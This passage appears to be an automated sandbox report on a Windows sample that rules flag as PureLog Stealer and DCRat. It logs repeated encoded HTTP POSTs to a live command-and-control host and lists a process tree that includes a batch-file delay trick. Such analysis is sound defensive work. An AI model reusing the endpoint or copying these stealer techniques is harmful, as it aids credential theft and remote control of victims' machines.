                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nu%2Ba4CLbBUicKJh339zuWeKB%2FMAiM3nGxdDn9FtLlO%2FaE%2B90yGX1Wtky2qWdoD85zsbSt3VVzKr8P1ciWKNnOUHbWvBVYKOjJXT73mR7mhDILBbgxJ737gCY22o%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c6cbea242d0-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=5063&min_rtt=1763&rtt_var=7263&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=51828&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            78 | 192.168.2.4 | 49844 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:38:05.036149979 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:38:05.388701916 CET | 2536 | OUT | Data Raw: 50 51 46 5a 5f 5d 58 5f 5d 5a 56 51 50 5f 57 50 55 54 5e 48 5a 5f 5b 5a 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PQFZ_]X_]ZVQP_WPUT^HZ_[Z\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$]<>&=#X"?*A([47&X1'=1U)30>6< "8+.F'#P
                                                            Dec 15, 2024 19:38:06.123265982 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:38:06.374641895 CET | 794 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:38:06 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NdwJtBtdQdvMYZTscohfMVQ55ven215l%2FREG3XtxFbAE98uaaixCZ8bOw3oGw6KKZxIKnAX9KNBZgBtvrOXBwBQaIm%2FUbes3lTKjPnLlaSSR1YR9SyMEDX%2BtkeU%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c775b5bc46d-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3851&min_rtt=1590&rtt_var=5119&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=74183&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            79 | 192.168.2.4 | 49845 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:38:06.615848064 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:38:06.966782093 CET | 2536 | OUT | Data Raw: 50 56 43 5b 5a 5c 58 53 5d 5a 56 51 50 50 57 51 55 51 5e 45 5a 51 5b 59 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PVC[Z\XS]ZVQPPWQUQ^EZQ[Y\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$+.=975(( ?8%1P=#;[$>*X+1W,;.F'#P
                                                            Dec 15, 2024 19:38:07.703382969 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:38:07.965614080 CET | 794 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:38:07 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mXSd0dBaorpllO8hb68qEZn9hPXeIBh%2BRK6HLnuLvkng6UgjuLNiKbXx01hXPgS1%2FRZXiw5t8Zda42nTukAfsKKWsL3f9xkhf1Qd11U48tO58g48Iq3F%2FVweKS4%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c813d808c18-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3977&min_rtt=2053&rtt_var=4618&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=83691&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            80 | 192.168.2.4 | 49846 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:38:08.210261106 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            81 | 192.168.2.4 | 49847 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:38:08.338500023 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:38:08.690563917 CET | 1420 | OUT | Data Raw: 55 53 43 51 5f 5e 5d 55 5d 5a 56 51 50 51 57 54 55 50 5e 48 5a 54 5b 58 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: USCQ_^]U]ZVQPQWTUP^HZT[X\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$Z?>*45?>E)=$!/\1"2.=#+X3>=3&,.F'#P
                                                            Dec 15, 2024 19:38:09.426402092 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:38:09.660123110 CET | 946 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:38:09 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gAfELm%2FZYNZTUVi7Ryg0Kkf4sKulI%2BmmlqOVnW0MHohdxXOs9Wfk5802X5CLSg8%2Ftnb1cZyTF4rQ3AEgRT1C92mA1Htg6GK8SJU8eaw69tZjrxyVoFr%2Fpm7GZNE%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c8bf9e90f74-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3546&min_rtt=2137&rtt_var=3620&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1740&delivery_rate=108865&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 3a 01 36 29 3e 57 23 58 33 0c 3a 3c 00 0e 3f 30 34 06 24 31 25 10 24 06 37 5d 2a 3d 38 0e 32 00 2d 1c 22 32 29 50 2b 37 00 02 32 0c 21 51 03 11 22 58 32 10 27 05 3e 00 2b 06 24 32 2f 14 31 2e 38 14 28 28 00 50 27 01 24 0e 23 2e 0a 50 2e 03 24 5a 28 14 23 5b 2e 00 22 13 20 36 2e 53 0c 17 25 11 3c 29 08 5f 23 21 21 55 30 02 33 57 20 29 00 55 2a 30 28 1e 27 0a 24 0c 27 10 3f 08 36 0e 04 09 32 14 29 07 20 0c 0c 1e 3e 18 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 98:6)>W#X3:<?04$1%$7]*=82-"2)P+72!Q"X2'>+$2/1.8((P'$#.P.$Z(#[." 6.S%<)_#!!U03W )U*0('$'?62) >%\ .R4]T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            82 | 192.168.2.4 | 49848 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:38:08.465217113 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:38:08.810574055 CET | 2536 | OUT | Data Raw: 55 54 43 5b 5f 57 5d 52 5d 5a 56 51 50 50 57 55 55 53 5e 44 5a 57 5b 5f 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UTC[_W]R]ZVQPPWUUS^DZW[_\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$)=Y)6<[!,71>&&%>U/'=+3=W,+.F'#P
                                                            Dec 15, 2024 19:38:09.552788973 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:38:09.799356937 CET | 795 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:38:09 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g0ae1IMmbVfmFPcnVJK8L1tcOJ%2B6uA6bFAcMwIBjBv0rsANZXbES1h2Gc956vz31iWXymz42aD1fwM4Dpif%2FT2J04xx3M3yaqZO5nqz3urISDqP6og8cf0%2Byp7k%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c8ccd018ce9-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7115&min_rtt=2016&rtt_var=10954&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=34104&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            83 | 192.168.2.4 | 49849 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:38:10.038223028 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2532
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:38:10.388631105 CET | 2532 | OUT | Data Raw: 50 56 46 5c 5a 5a 58 53 5d 5a 56 51 50 58 57 51 55 54 5e 48 5a 52 5b 58 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PVF\ZZXS]ZVQPXWQUT^HZR[X\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y')->:!Z:@+4/$2->_1:>030=&^+3),.F'#P /
                                                            Dec 15, 2024 19:38:11.135191917 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:38:11.386907101 CET | 793 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:38:11 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WxSkXC%2FTdwNi7v9MhTtrg5UyM3uAmYHUAzfy7RabBQIuCedPODWHo4aXUPzQVWi1wLA5GhFmcvRQuAQJSnMP9XhwnYxh0p8j8iMx8m95GpAs67CWkce%2BrMpfouA%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c969ebcc342-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3065&min_rtt=1660&rtt_var=3434&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2828&delivery_rate=113116&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            84 | 192.168.2.4 | 49850 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:38:11.632988930 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:38:11.982456923 CET | 2536 | OUT | Data Raw: 55 55 43 5c 5f 59 58 57 5d 5a 56 51 50 5d 57 51 55 51 5e 46 5a 54 5b 5b 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UUC\_YXW]ZVQP]WQUQ^FZT[[\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'(==#X6<=+4#<('=&\'-:( 3_3+U!U,.F'#P 3
                                                            Dec 15, 2024 19:38:12.721189976 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:38:12.956275940 CET | 792 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:38:12 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XWd8J7GwQChJw5BxePY5pA5jnQ8uz5OAxQhhpPw28VeGPqz3mA%2FZOkOh%2B4bGDEYpZxuF5nDLaCXGieW9x9vUiKsQSQanIAOrU6tHEDhyBaoWe7u4Y2nJdXmEEVA%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288ca08fa8185d-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3947&min_rtt=2336&rtt_var=4099&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=95876&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            85 | 192.168.2.4 | 49851 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:38:13.198107958 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2532
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:38:13.545295000 CET | 2532 | OUT | Data Raw: 55 57 46 5d 5f 58 5d 51 5d 5a 56 51 50 58 57 54 55 5d 5e 40 5a 56 5b 5e 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UWF]_X]Q]ZVQPXWTU]^@ZV[^\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$\<!*#\"6@(=#7'%&^%=!*;3>Y<1R,.F'#P
                                                            Dec 15, 2024 19:38:14.289156914 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:38:14.524080038 CET | 792 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:38:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6dCjlwrGwVJZDoY0HivOlRWYSdibdYcPkTfJvW5YGX%2BaFrdsq822zzqCtrHoP3pjaiD5NCB4t3w4x8fcdyVb1KdHgerpfA%2FtHIQfWYfXFgdHyKAUQfMhDYzrF5U%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288caa5cf7de95-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4480&min_rtt=1546&rtt_var=6448&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2852&delivery_rate=58350&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0



                                                            Target ID:0
                                                            Start time:13:36:08
                                                            Start date:15/12/2024
                                                            Path:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\150bIjWiGH.exe"
                                                            Imagebase:0xfc0000
                                                            File size:3'700'736 bytes
                                                            MD5 hash:E7870CD0C30A52066C454C15A5A5A2F5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1674964023.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1731048102.0000000013AC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:13:36:13
                                                            Start date:15/12/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\abd16af8Ll.bat"
                                                            Imagebase:0x7ff67f270000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:13:36:13
                                                            Start date:15/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:13:36:13
                                                            Start date:15/12/2024
                                                            Path:C:\Windows\System32\chcp.com
                                                            Wow64 process (32bit):false
                                                            Commandline:chcp 65001
                                                            Imagebase:0x7ff658cc0000
                                                            File size:14'848 bytes
                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:13:36:13
                                                            Start date:15/12/2024
                                                            Path:C:\Windows\System32\w32tm.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                            Imagebase:0x7ff78b140000
                                                            File size:108'032 bytes
                                                            MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:13:36:18
                                                            Start date:15/12/2024
                                                            Path:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\150bIjWiGH.exe"
                                                            Imagebase:0x720000
                                                            File size:3'700'736 bytes
                                                            MD5 hash:E7870CD0C30A52066C454C15A5A5A2F5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2924790458.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2924790458.0000000003215000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                              • Instruction Fuzzy Hash: 3CC1D03061965A8BEB2CCF64C4E05B937A1FF45310B9546BDC85A8B69FCB3CE981CB41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1762302817.00007FFD9BFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9bfc0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5de0be5dec73e34f212759d5ef239204e811de1d379b613d4a038cb084daa02b
                                                              • Instruction ID: eae37ffef8edb81f1306af77fa7b295e699b16848f1c3fe26b15b10a7980ac37
                                                              • Opcode Fuzzy Hash: 5de0be5dec73e34f212759d5ef239204e811de1d379b613d4a038cb084daa02b
                                                              • Instruction Fuzzy Hash: 8E21FC61F0F19B8AF6357EE478334B826509F41354F1607B6C44E861E6DC2E29CD6382
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1762302817.00007FFD9BFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd9bfc0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ea9a8781955844f85352ee6b6dff1f0e70508e1d0147c726cb62dce415835ca4
                                                              • Instruction ID: c2d0f20ea82a7e3a7a070925e93d780f4ae9dc367dd46e886439f0e4c35d1551
                                                              • Opcode Fuzzy Hash: ea9a8781955844f85352ee6b6dff1f0e70508e1d0147c726cb62dce415835ca4
